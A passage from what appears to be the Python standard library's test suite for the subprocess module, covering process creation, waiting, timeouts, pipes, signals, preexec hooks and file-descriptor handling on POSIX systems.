self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
class Path:
def __fspath__(self):
# the name of a command that can be run without
# any argumenets that exit fast
return 'dir' if mswindows else 'ls'
path = Path()
if mswindows:
res = subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
else:
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
class Path:
def __fspath__(self):
# the name of a command that can be run without
# any argumenets that exits fast
return sys.executable
path = Path()
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead capture the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
# We mock the __del__ method for Popen in the next two tests
# because it does cleanup based on the pid returned by fork_exec
# along with issuing a resource warning if it still exists. Since
# we don't actually spawn a process in these tests we can forego
# the destructor. An alternative would be to set _child_created to
# False before the destructor is called but there is no easy way
# to do that
class PopenNoDestructor(subprocess.Popen):
def __del__(self):
pass
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_normal(self, fork_exec):
"""Test error passing done through errpipe_write in the good case"""
def proper_error(*args):
errpipe_write = args[13]
# Write the hex for the error code EISDIR: 'is a directory'
err_code = '{:x}'.format(errno.EISDIR).encode()
os.write(errpipe_write, b"OSError:" + err_code + b":")
return 0
fork_exec.side_effect = proper_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(IsADirectoryError):
self.PopenNoDestructor(["non_existent_command"])
@mock.patch("subprocess._posixsubprocess.fork_exec")
def test_exception_errpipe_bad_data(self, fork_exec):
"""Test error passing done through errpipe_write where its not
in the expected format"""
error_data = b"\xFF\x00\xDE\xAD"
def bad_error(*args):
errpipe_write = args[13]
# Anything can be in the pipe, no assumptions should
# be made about its encoding, so we'll write some
# arbitrary hex bytes to test it out
os.write(errpipe_write, error_data)
return 0
fork_exec.side_effect = bad_error
with mock.patch("subprocess.os.waitpid",
side_effect=ChildProcessError):
with self.assertRaises(subprocess.SubprocessError) as e:
self.PopenNoDestructor(["non_existent_command"])
self.assertIn(repr(error_data), str(e.exception))
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
